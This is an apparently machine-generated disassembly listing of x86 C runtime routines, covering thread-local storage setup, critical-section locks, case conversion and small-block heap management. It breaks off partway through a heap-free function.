		push	0Dh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	edi, [esi+68h]
		test	edi, edi
		jz	short loc_405A1E
		push	edi
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_405A1E
		cmp	edi, offset dword_424070
		jz	short loc_405A1E
		push	edi
		call	sub_403B91
		pop	ecx

loc_405A1E:				; CODE XREF: sub_405975+8Dj
					; sub_405975+98j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405A81
		push	0Ch
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], 1
		mov	edi, [esi+6Ch]
		test	edi, edi
		jz	short loc_405A63
		push	edi
		call	sub_4055A7
		pop	ecx
		cmp	edi, off_424678
		jz	short loc_405A63
		cmp	edi, offset dword_4245A0
		jz	short loc_405A63
		cmp	dword ptr [edi], 0
		jnz	short loc_405A63
		push	edi
		call	sub_4053E1
		pop	ecx

loc_405A63:				; CODE XREF: sub_405975+C9j
					; sub_405975+D8j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405A8D
		push	esi
		call	sub_403B91
		pop	ecx

loc_405A76:				; CODE XREF: sub_405975+11j
		call	__SEH_epilog4
		retn	4
sub_405975	endp


; =============== S U B	R O U T	I N E =======================================



sub_405A7E	proc near		; DATA XREF: jlrllt49:00422A38o
		mov	esi, [ebp+8]
sub_405A7E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_405A81	proc near		; CODE XREF: sub_405975+B0p
		push	0Dh
		call	sub_405EDF
		pop	ecx
		retn
sub_405A81	endp


; =============== S U B	R O U T	I N E =======================================



sub_405A8A	proc near		; DATA XREF: jlrllt49:00422A44o
		mov	esi, [ebp+8]
sub_405A8A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_405A8D	proc near		; CODE XREF: sub_405975+F5p
		push	0Ch
		call	sub_405EDF
		pop	ecx
		retn
sub_405A8D	endp


; =============== S U B	R O U T	I N E =======================================



sub_405A96	proc near		; CODE XREF: .text:loc_4045E5p
		push	edi
		push	offset aKernel32_dll ; "KERNEL32.DLL"
		call	ds:dword_41E0E0	; GetModuleHandleA
		mov	edi, eax
		test	edi, edi
		jnz	short loc_405AB1
		call	sub_4057E9
		xor	eax, eax
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_405AB1:				; CODE XREF: sub_405A96+10j
		push	esi
		mov	esi, ds:off_41E0E8
		push	offset dword_41E4F4
		push	edi
		call	esi ; sub_457FDC
		push	offset aFlsgetvalue ; "FlsGetValue"
		push	edi
		mov	off_428164, eax
		call	esi ; sub_457FDC
		push	offset aFlssetvalue ; "FlsSetValue"
		push	edi
		mov	off_428168, eax
		call	esi ; sub_457FDC
		push	offset aFlsfree	; "FlsFree"
		push	edi
		mov	off_42816C, eax
		call	esi ; sub_457FDC
		cmp	off_428164, 0
		mov	esi, ds:dword_41E178
		mov	off_428170, eax
		jz	short loc_405B11
		cmp	off_428168, 0
		jz	short loc_405B11
		cmp	off_42816C, 0
		jz	short loc_405B11
		test	eax, eax
		jnz	short loc_405B35

loc_405B11:				; CODE XREF: sub_405A96+63j
					; sub_405A96+6Cj ...
		mov	eax, ds:dword_41E180
		mov	off_428168, eax
		mov	eax, ds:off_41E174
		mov	off_428164, offset sub_4057B6
		mov	off_42816C, esi
		mov	off_428170, eax

loc_405B35:				; CODE XREF: sub_405A96+79j
		call	ds:dword_41E17C	; TlsAlloc
		cmp	eax, 0FFFFFFFFh
		mov	dword_42468C, eax
		jz	loc_405C15
		push	off_428168
		push	eax
		call	esi	; TlsSetValue
		test	eax, eax
		jz	loc_405C15
		call	sub_4080D9
		push	off_428164
		call	sub_4056E7
		push	off_428168
		mov	off_428164, eax
		call	sub_4056E7
		push	off_42816C
		mov	off_428168, eax
		call	sub_4056E7
		push	off_428170
		mov	off_42816C, eax
		call	sub_4056E7
		add	esp, 10h
		mov	off_428170, eax
		call	sub_405E41
		test	eax, eax
		jz	short loc_405C10
		push	offset sub_405975
		push	off_428164
		call	sub_405753
		pop	ecx
		call	eax	; TlsGetValue
		cmp	eax, 0FFFFFFFFh
		mov	dword_424688, eax
		jz	short loc_405C10
		push	214h
		push	1
		call	sub_407D3A
		mov	esi, eax
		test	esi, esi
		pop	ecx
		pop	ecx
		jz	short loc_405C10
		push	esi
		push	dword_424688
		push	off_42816C
		call	sub_405753
		pop	ecx
		call	eax	; TlsGetValue
		test	eax, eax
		jz	short loc_405C10
		push	0
		push	esi
		call	sub_405826
		pop	ecx
		pop	ecx
		call	ds:dword_41E0DC	; GetCurrentThreadId
		or	dword ptr [esi+4], 0FFFFFFFFh
		mov	[esi], eax
		xor	eax, eax
		inc	eax
		jmp	short loc_405C17
; ---------------------------------------------------------------------------

loc_405C10:				; CODE XREF: sub_405A96+113j
					; sub_405A96+130j ...
		call	sub_4057E9

loc_405C15:				; CODE XREF: sub_405A96+ADj
					; sub_405A96+BEj
		xor	eax, eax

loc_405C17:				; CODE XREF: sub_405A96+178j
		pop	esi
		pop	edi
		retn
sub_405A96	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405C1A	proc near		; CODE XREF: sub_402D64+9Bp
					; sub_402D64+ADp ...

var_18		= dword	ptr -18h
var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_8		= byte ptr -8
var_7		= byte ptr -7
var_4		= byte ptr -4
var_3		= byte ptr -3
var_2		= byte ptr -2
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_18]
		call	sub_402CAD
		mov	ebx, [ebp+arg_0]
		mov	esi, 100h
		cmp	ebx, esi
		jnb	short loc_405C8D
		mov	ecx, [ebp+var_18]
		cmp	dword ptr [ecx+0ACh], 1
		jle	short loc_405C59
		lea	eax, [ebp+var_18]
		push	eax
		push	1
		push	ebx
		call	sub_40D004
		mov	ecx, [ebp+var_18]
		add	esp, 0Ch
		jmp	short loc_405C66
; ---------------------------------------------------------------------------

loc_405C59:				; CODE XREF: sub_405C1A+29j
		mov	eax, [ecx+0C8h]
		movzx	eax, byte ptr [eax+ebx*2]
		and	eax, 1

loc_405C66:				; CODE XREF: sub_405C1A+3Dj
		test	eax, eax
		jz	short loc_405C79
		mov	eax, [ecx+0CCh]
		movzx	eax, byte ptr [eax+ebx]
		jmp	loc_405D20
; ---------------------------------------------------------------------------

loc_405C79:				; CODE XREF: sub_405C1A+4Ej
					; sub_405C1A+EAj
		cmp	[ebp+var_C], 0
		jz	short loc_405C86
		mov	eax, [ebp+var_10]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_405C86:				; CODE XREF: sub_405C1A+63j
		mov	eax, ebx
		jmp	loc_405D2D
; ---------------------------------------------------------------------------

loc_405C8D:				; CODE XREF: sub_405C1A+1Dj
		mov	eax, [ebp+var_18]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_405CCA
		mov	[ebp+arg_0], ebx
		sar	[ebp+arg_0], 8
		lea	eax, [ebp+var_18]
		push	eax
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh
		push	eax
		call	sub_40CFC0
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_405CCA
		mov	al, byte ptr [ebp+arg_0]
		push	2
		mov	[ebp+var_4], al
		mov	[ebp+var_3], bl
		mov	[ebp+var_2], 0
		pop	ecx
		jmp	short loc_405CDF
; ---------------------------------------------------------------------------

loc_405CCA:				; CODE XREF: sub_405C1A+7Dj
					; sub_405C1A+9Cj
		call	sub_405D93
		mov	dword ptr [eax], 2Ah
		xor	ecx, ecx
		mov	[ebp+var_4], bl
		mov	[ebp+var_3], 0
		inc	ecx

loc_405CDF:				; CODE XREF: sub_405C1A+AEj
		mov	eax, [ebp+var_18]
		push	1
		push	dword ptr [eax+4]
		lea	edx, [ebp+var_8]
		push	3
		push	edx
		push	ecx
		lea	ecx, [ebp+var_4]
		push	ecx
		push	esi
		push	dword ptr [eax+14h]
		lea	eax, [ebp+var_18]
		push	eax
		call	sub_40C8B9
		add	esp, 24h
		test	eax, eax
		jz	loc_405C79
		cmp	eax, 1
		jnz	short loc_405D15
		movzx	eax, [ebp+var_8]
		jmp	short loc_405D20
; ---------------------------------------------------------------------------

loc_405D15:				; CODE XREF: sub_405C1A+F3j
		movzx	ecx, [ebp+var_7]
		xor	eax, eax
		mov	ah, [ebp+var_8]
		or	eax, ecx

loc_405D20:				; CODE XREF: sub_405C1A+5Aj
					; sub_405C1A+F9j
		cmp	[ebp+var_C], 0
		jz	short loc_405D2D
		mov	ecx, [ebp+var_10]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

loc_405D2D:				; CODE XREF: sub_405C1A+6Ej
					; sub_405C1A+10Aj
		pop	esi
		pop	ebx
		leave
		retn
sub_405C1A	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D31	proc near		; CODE XREF: sub_410E7D+19p
					; sub_410E7D+36p

arg_0		= dword	ptr  4

		cmp	dword_428140, 0
		jnz	short loc_405D4A
		mov	eax, [esp+arg_0]
		lea	ecx, [eax-41h]
		cmp	ecx, 19h
		ja	short locret_405D57
		add	eax, 20h
		retn
; ---------------------------------------------------------------------------

loc_405D4A:				; CODE XREF: sub_405D31+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_405C1A
		pop	ecx
		pop	ecx

locret_405D57:				; CODE XREF: sub_405D31+13j
		retn
sub_405D31	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D58	proc near		; CODE XREF: sub_403B91+80p
					; sub_405DB9+Dp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		xor	ecx, ecx

loc_405D5E:				; CODE XREF: sub_405D58+13j
		cmp	eax, dword_424690[ecx*8]
		jz	short loc_405D79
		inc	ecx
		cmp	ecx, 2Dh
		jl	short loc_405D5E
		lea	ecx, [eax-13h]
		cmp	ecx, 11h
		ja	short loc_405D81
		push	0Dh
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_405D79:				; CODE XREF: sub_405D58+Dj
		mov	eax, dword_424694[ecx*8]
		retn
; ---------------------------------------------------------------------------

loc_405D81:				; CODE XREF: sub_405D58+1Bj
		add	eax, 0FFFFFF44h
		push	0Eh
		pop	ecx
		cmp	ecx, eax
		sbb	eax, eax
		and	eax, ecx
		add	eax, 8
		retn
sub_405D58	endp


; =============== S U B	R O U T	I N E =======================================



sub_405D93	proc near		; CODE XREF: sub_402D64+19p
					; sub_402D64+4Fp ...
		call	sub_4058DA
		test	eax, eax
		jnz	short loc_405DA2
		mov	eax, offset dword_4247F8
		retn
; ---------------------------------------------------------------------------

loc_405DA2:				; CODE XREF: sub_405D93+7j
		add	eax, 8
		retn
sub_405D93	endp


; =============== S U B	R O U T	I N E =======================================



sub_405DA6	proc near		; CODE XREF: sub_405DB9+1p
					; sub_4090A1+14p ...
		call	sub_4058DA
		test	eax, eax
		jnz	short loc_405DB5
		mov	eax, offset dword_4247FC
		retn
; ---------------------------------------------------------------------------

loc_405DB5:				; CODE XREF: sub_405DA6+7j
		add	eax, 0Ch
		retn
sub_405DA6	endp


; =============== S U B	R O U T	I N E =======================================



sub_405DB9	proc near		; CODE XREF: sub_40900D+84p
					; sub_40A36D+3FBp ...

arg_0		= dword	ptr  4

		push	esi
		call	sub_405DA6
		mov	ecx, [esp+4+arg_0]
		push	ecx
		mov	[eax], ecx
		call	sub_405D58
		pop	ecx
		mov	esi, eax
		call	sub_405D93
		mov	[eax], esi
		pop	esi
		retn
sub_405DB9	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405DE0	proc near		; CODE XREF: sub_402E87+9Ap
					; sub_402F77+42j

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	edi
		push	esi
		push	ebx
		mov	ecx, [ebp+arg_8]
		or	ecx, ecx
		jz	short loc_405E3A
		mov	esi, [ebp+arg_0]
		mov	edi, [ebp+arg_4]
		mov	bh, 41h
		mov	bl, 5Ah
		mov	dh, 20h
		lea	ecx, [ecx+0]

loc_405DFC:				; CODE XREF: sub_405DE0+49j
		mov	ah, [esi]
		or	ah, ah
		mov	al, [edi]
		jz	short loc_405E2B
		or	al, al
		jz	short loc_405E2B
		add	esi, 1
		add	edi, 1
		cmp	ah, bh
		jb	short loc_405E18
		cmp	ah, bl
		ja	short loc_405E18
		add	ah, dh

loc_405E18:				; CODE XREF: sub_405DE0+30j
					; sub_405DE0+34j
		cmp	al, bh
		jb	short loc_405E22
		cmp	al, bl
		ja	short loc_405E22
		add	al, dh

loc_405E22:				; CODE XREF: sub_405DE0+3Aj
					; sub_405DE0+3Ej
		cmp	ah, al
		jnz	short loc_405E31
		sub	ecx, 1
		jnz	short loc_405DFC

loc_405E2B:				; CODE XREF: sub_405DE0+22j
					; sub_405DE0+26j
		xor	ecx, ecx
		cmp	ah, al
		jz	short loc_405E3A

loc_405E31:				; CODE XREF: sub_405DE0+44j
		mov	ecx, 0FFFFFFFFh
		jb	short loc_405E3A
		neg	ecx

loc_405E3A:				; CODE XREF: sub_405DE0+Bj
					; sub_405DE0+4Fj ...
		mov	eax, ecx
		pop	ebx
		pop	esi
		pop	edi
		leave
		retn
sub_405DE0	endp


; =============== S U B	R O U T	I N E =======================================



sub_405E41	proc near		; CODE XREF: sub_405A96+10Cp
		push	esi
		push	edi
		xor	esi, esi
		mov	edi, offset dword_428178

loc_405E4A:				; CODE XREF: sub_405E41+35j
		cmp	dword_424804[esi*8], 1
		jnz	short loc_405E72
		lea	eax, ds:424800h[esi*8]
		mov	[eax], edi
		push	0FA0h
		push	dword ptr [eax]
		add	edi, 18h
		call	sub_40D0D4
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_405E7E

loc_405E72:				; CODE XREF: sub_405E41+11j
		inc	esi
		cmp	esi, 24h
		jl	short loc_405E4A
		xor	eax, eax
		inc	eax

loc_405E7B:				; CODE XREF: sub_405E41+47j
		pop	edi
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_405E7E:				; CODE XREF: sub_405E41+2Fj
		and	off_424800[esi*8], 0
		xor	eax, eax
		jmp	short loc_405E7B
sub_405E41	endp


; =============== S U B	R O U T	I N E =======================================



sub_405E8A	proc near		; CODE XREF: sub_4057E9:loc_405821j
		push	ebx
		mov	ebx, ds:off_41E16C
		push	esi
		mov	esi, offset off_424800
		push	edi

loc_405E98:				; CODE XREF: sub_405E8A+30j
		mov	edi, [esi]
		test	edi, edi
		jz	short loc_405EB1
		cmp	dword ptr [esi+4], 1
		jz	short loc_405EB1
		push	edi
		call	ebx ; sub_443AED
		push	edi
		call	sub_403B91
		and	dword ptr [esi], 0
		pop	ecx

loc_405EB1:				; CODE XREF: sub_405E8A+12j
					; sub_405E8A+18j
		add	esi, 8
		cmp	esi, offset dword_424920
		jl	short loc_405E98
		mov	esi, offset off_424800
		pop	edi

loc_405EC2:				; CODE XREF: sub_405E8A+50j
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_405ED1
		cmp	dword ptr [esi+4], 1
		jnz	short loc_405ED1
		push	eax
		call	ebx ; sub_443AED

loc_405ED1:				; CODE XREF: sub_405E8A+3Cj
					; sub_405E8A+42j
		add	esi, 8
		cmp	esi, offset dword_424920
		jl	short loc_405EC2
		pop	esi
		pop	ebx
		retn
sub_405E8A	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405EDF	proc near		; CODE XREF: sub_40306D+2p
					; sub_403BE7+2p ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		push	off_424800[eax*8]
		call	ds:dword_41E168	; RtlLeaveCriticalSection
		pop	ebp
		retn
sub_405EDF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405EF4	proc near		; CODE XREF: sub_405FB7+14p
					; sub_408A61+4Fp ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_422A48
		call	__SEH_prolog4
		xor	edi, edi
		inc	edi
		mov	[ebp+var_1C], edi
		xor	ebx, ebx
		cmp	dword_4282C8, ebx
		jnz	short loc_405F28
		call	sub_40A214
		push	1Eh
		call	sub_40A074
		push	0FFh
		call	sub_407E67
		pop	ecx
		pop	ecx

loc_405F28:				; CODE XREF: sub_405EF4+1Aj
		mov	esi, [ebp+arg_0]
		lea	esi, ds:424800h[esi*8]
		cmp	[esi], ebx
		jz	short loc_405F3A
		mov	eax, edi
		jmp	short loc_405FA8
; ---------------------------------------------------------------------------

loc_405F3A:				; CODE XREF: sub_405EF4+40j
		push	18h
		call	sub_407CFA
		pop	ecx
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_405F57
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		xor	eax, eax
		jmp	short loc_405FA8
; ---------------------------------------------------------------------------

loc_405F57:				; CODE XREF: sub_405EF4+52j
		push	0Ah
		call	sub_405FB7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[esi], ebx
		jnz	short loc_405F92
		push	0FA0h
		push	edi
		call	sub_40D0D4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_405F8E
		push	edi
		call	sub_403B91
		pop	ecx
		call	sub_405D93
		mov	dword ptr [eax], 0Ch
		mov	[ebp+var_1C], ebx
		jmp	short loc_405F99
; ---------------------------------------------------------------------------

loc_405F8E:				; CODE XREF: sub_405EF4+81j
		mov	[esi], edi
		jmp	short loc_405F99
; ---------------------------------------------------------------------------

loc_405F92:				; CODE XREF: sub_405EF4+70j
		push	edi
		call	sub_403B91
		pop	ecx

loc_405F99:				; CODE XREF: sub_405EF4+98j
					; sub_405EF4+9Cj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_405FAE
		mov	eax, [ebp+var_1C]

loc_405FA8:				; CODE XREF: sub_405EF4+44j
					; sub_405EF4+61j
		call	__SEH_epilog4
		retn
sub_405EF4	endp


; =============== S U B	R O U T	I N E =======================================



sub_405FAE	proc near		; CODE XREF: sub_405EF4+ACp
					; DATA XREF: jlrllt49:00422A60o
		push	0Ah
		call	sub_405EDF
		pop	ecx
		retn
sub_405FAE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405FB7	proc near		; CODE XREF: sub_402FD3+44p
					; sub_403B91+1Ep ...

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		push	esi
		lea	esi, ds:424800h[eax*8]
		cmp	dword ptr [esi], 0
		jnz	short loc_405FDD
		push	eax
		call	sub_405EF4
		test	eax, eax
		pop	ecx
		jnz	short loc_405FDD
		push	11h
		call	sub_407E1D
		pop	ecx

loc_405FDD:				; CODE XREF: sub_405FB7+11j
					; sub_405FB7+1Cj
		push	dword ptr [esi]
		call	ds:dword_41E164	; RtlEnterCriticalSection
		pop	esi
		pop	ebp
		retn
sub_405FB7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405FE8	proc near		; CODE XREF: sub_406043:loc_406066p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		lea	eax, [ebp+var_4]
		xor	esi, esi
		push	eax
		mov	[ebp+var_4], esi
		mov	[ebp+var_8], esi
		call	sub_407EC6
		test	eax, eax
		pop	ecx
		jz	short loc_406011
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_406011:				; CODE XREF: sub_405FE8+1Aj
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_407EFD
		test	eax, eax
		pop	ecx
		jz	short loc_40602C
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_40602C:				; CODE XREF: sub_405FE8+35j
		cmp	[ebp+var_4], 2
		pop	esi
		jnz	short loc_40603E
		cmp	[ebp+var_8], 5
		jb	short loc_40603E
		xor	eax, eax
		inc	eax
		leave
		retn
; ---------------------------------------------------------------------------

loc_40603E:				; CODE XREF: sub_405FE8+49j
					; sub_405FE8+4Fj
		push	3
		pop	eax
		leave
		retn
sub_405FE8	endp


; =============== S U B	R O U T	I N E =======================================



sub_406043	proc near		; CODE XREF: .text:004045D3p

arg_0		= dword	ptr  4

		xor	eax, eax
		cmp	[esp+arg_0], eax
		push	0
		setz	al
		push	1000h
		push	eax
		call	ds:dword_41E15C	; HeapCreate
		test	eax, eax
		mov	dword_4282C8, eax
		jnz	short loc_406066

loc_406063:				; CODE XREF: sub_406043+54j
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_406066:				; CODE XREF: sub_406043+1Ej
		call	sub_405FE8
		cmp	eax, 3
		mov	dword_438854, eax
		jnz	short loc_406099
		push	3F8h
		call	sub_40609D
		test	eax, eax
		pop	ecx
		jnz	short loc_406099
		push	dword_4282C8
		call	ds:off_41E160
		and	dword_4282C8, 0
		jmp	short loc_406063
; ---------------------------------------------------------------------------

loc_406099:				; CODE XREF: sub_406043+30j
					; sub_406043+3Fj
		xor	eax, eax
		inc	eax
		retn
sub_406043	endp


; =============== S U B	R O U T	I N E =======================================



sub_40609D	proc near		; CODE XREF: sub_406043+37p

arg_0		= dword	ptr  4

		push	140h
		push	0
		push	dword_4282C8
		call	ds:dword_41E110	; RtlAllocateHeap
		test	eax, eax
		mov	dword_438840, eax
		jnz	short loc_4060BA
		retn
; ---------------------------------------------------------------------------

loc_4060BA:				; CODE XREF: sub_40609D+1Aj
		mov	ecx, [esp+arg_0]
		and	dword_4282CC, 0
		and	dword_43883C, 0
		mov	dword_438848, eax
		xor	eax, eax
		mov	dword_438844, ecx
		mov	dword_43884C, 10h
		inc	eax
		retn
sub_40609D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4060E5	proc near		; CODE XREF: sub_402FD3+4Ep
					; sub_403B91+29p ...

arg_0		= dword	ptr  4

		mov	ecx, dword_43883C
		mov	eax, dword_438840
		imul	ecx, 14h
		add	ecx, eax
		jmp	short loc_406109
; ---------------------------------------------------------------------------

loc_4060F7:				; CODE XREF: sub_4060E5+26j
		mov	edx, [esp+arg_0]
		sub	edx, [eax+0Ch]
		cmp	edx, 100000h
		jb	short locret_40610F
		add	eax, 14h

loc_406109:				; CODE XREF: sub_4060E5+10j
		cmp	eax, ecx
		jb	short loc_4060F7
		xor	eax, eax

locret_40610F:				; CODE XREF: sub_4060E5+1Fj
		retn
sub_4060E5	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406110	proc near		; CODE XREF: sub_403B91+38p
					; sub_40E02D+B5p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+10h]
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		mov	edi, esi
		sub	edi, [ecx+0Ch]
		add	esi, 0FFFFFFFCh
		shr	edi, 0Fh
		mov	ecx, edi
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_10], ecx
		mov	ecx, [esi]
		dec	ecx
		test	cl, 1
		mov	[ebp+var_4], ecx
		jnz	loc_406420
		push	ebx
		lea	ebx, [ecx+esi]
		mov	edx, [ebx]
		mov	[ebp+var_C], edx
		mov	edx, [esi-4]
		mov	[ebp+var_8], edx
		mov	edx, [ebp+var_C]
		test	dl, 1
		mov	[ebp+arg_4], ebx
		jnz	short loc_4061DB
		sar	edx, 4
		dec	edx
		cmp	edx, 3Fh
		jbe	short loc_406173
		push	3Fh
		pop	edx

loc_406173:				; CODE XREF: sub_406110+5Ej
		mov	ecx, [ebx+4]
		cmp	ecx, [ebx+8]
		jnz	short loc_4061BD
		cmp	edx, 20h
		mov	ebx, 80000000h
		jnb	short loc_40619E
		mov	ecx, edx
		shr	ebx, cl
		lea	ecx, [edx+eax+4]
		not	ebx
		and	[eax+edi*4+44h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_4061BA
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_4061BA
; ---------------------------------------------------------------------------

loc_40619E:				; CODE XREF: sub_406110+73j
		lea	ecx, [edx-20h]
		shr	ebx, cl
		lea	ecx, [edx+eax+4]
		not	ebx
		and	[eax+edi*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_4061BA
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_4061BA:				; CODE XREF: sub_406110+85j
					; sub_406110+8Cj ...
		mov	ebx, [ebp+arg_4]

loc_4061BD:				; CODE XREF: sub_406110+69j
		mov	edx, [ebx+8]
		mov	ebx, [ebx+4]
		mov	ecx, [ebp+var_4]
		add	ecx, [ebp+var_C]
		mov	[edx+4], ebx
		mov	edx, [ebp+arg_4]
		mov	ebx, [edx+4]
		mov	edx, [edx+8]
		mov	[ebx+8], edx
		mov	[ebp+var_4], ecx

loc_4061DB:				; CODE XREF: sub_406110+55j
		mov	edx, ecx
		sar	edx, 4
		dec	edx
		cmp	edx, 3Fh
		jbe	short loc_4061E9
		push	3Fh
		pop	edx

loc_4061E9:				; CODE XREF: sub_406110+D4j
		mov	ebx, [ebp+var_8]
		and	ebx, 1
		mov	[ebp+var_C], ebx
		jnz	loc_406287
		sub	esi, [ebp+var_8]
		mov	ebx, [ebp+var_8]
		sar	ebx, 4
		push	3Fh
		mov	[ebp+arg_4], esi
		dec	ebx
		pop	esi
		cmp	ebx, esi
		jbe	short loc_40620E
		mov	ebx, esi

loc_40620E:				; CODE XREF: sub_406110+FAj
		add	ecx, [ebp+var_8]
		mov	edx, ecx
		sar	edx, 4
		dec	edx
		cmp	edx, esi
		mov	[ebp+var_4], ecx
		jbe	short loc_406220
		mov	edx, esi

loc_406220:				; CODE XREF: sub_406110+10Cj
		cmp	ebx, edx
		jz	short loc_406282
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+4]
		cmp	esi, [ecx+8]
		jnz	short loc_40626A
		cmp	ebx, 20h
		mov	esi, 80000000h
		jnb	short loc_406250
		mov	ecx, ebx
		shr	esi, cl
		not	esi
		and	[eax+edi*4+44h], esi
		dec	byte ptr [ebx+eax+4]
		jnz	short loc_40626A
		mov	ecx, [ebp+arg_0]
		and	[ecx], esi
		jmp	short loc_40626A
; ---------------------------------------------------------------------------

loc_406250:				; CODE XREF: sub_406110+127j
		lea	ecx, [ebx-20h]
		shr	esi, cl
		not	esi
		and	[eax+edi*4+0C4h], esi
		dec	byte ptr [ebx+eax+4]
		jnz	short loc_40626A
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], esi

loc_40626A:				; CODE XREF: sub_406110+11Dj
					; sub_406110+137j ...
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+8]
		mov	ecx, [ecx+4]
		mov	[esi+4], ecx
		mov	ecx, [ebp+arg_4]
		mov	esi, [ecx+4]
		mov	ecx, [ecx+8]
		mov	[esi+8], ecx

loc_406282:				; CODE XREF: sub_406110+112j
		mov	esi, [ebp+arg_4]
		jmp	short loc_40628A
; ---------------------------------------------------------------------------

loc_406287:				; CODE XREF: sub_406110+E2j
		mov	ebx, [ebp+arg_0]

loc_40628A:				; CODE XREF: sub_406110+175j
		cmp	[ebp+var_C], 0
		jnz	short loc_406298
		cmp	ebx, edx
		jz	loc_406318

loc_406298:				; CODE XREF: sub_406110+17Ej
		mov	ecx, [ebp+var_10]
		lea	ecx, [ecx+edx*8]
		mov	ebx, [ecx+4]
		mov	[esi+8], ecx
		mov	[esi+4], ebx
		mov	[ecx+4], esi
		mov	ecx, [esi+4]
		mov	[ecx+8], esi
		mov	ecx, [esi+4]
		cmp	ecx, [esi+8]
		jnz	short loc_406318
		mov	cl, [edx+eax+4]
		mov	byte ptr [ebp+arg_4+3],	cl
		inc	cl
		cmp	edx, 20h
		mov	[edx+eax+4], cl
		jnb	short loc_4062EF
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_4062DE
		mov	ecx, edx
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], ebx

loc_4062DE:				; CODE XREF: sub_406110+1BEj
		mov	ebx, 80000000h
		mov	ecx, edx
		shr	ebx, cl
		lea	eax, [eax+edi*4+44h]
		or	[eax], ebx
		jmp	short loc_406318
; ---------------------------------------------------------------------------

loc_4062EF:				; CODE XREF: sub_406110+1B8j
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406305
		lea	ecx, [edx-20h]
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], ebx

loc_406305:				; CODE XREF: sub_406110+1E3j
		lea	ecx, [edx-20h]
		mov	edx, 80000000h
		shr	edx, cl
		lea	eax, [eax+edi*4+0C4h]
		or	[eax], edx

loc_406318:				; CODE XREF: sub_406110+182j
					; sub_406110+1A6j ...
		mov	eax, [ebp+var_4]
		mov	[esi], eax
		mov	[eax+esi-4], eax
		mov	eax, [ebp+var_10]
		dec	dword ptr [eax]
		jnz	loc_40641F
		mov	eax, dword_4282CC
		test	eax, eax
		jz	loc_406411
		mov	ecx, dword_438850
		mov	esi, ds:off_41E158
		push	4000h
		shl	ecx, 0Fh
		add	ecx, [eax+0Ch]
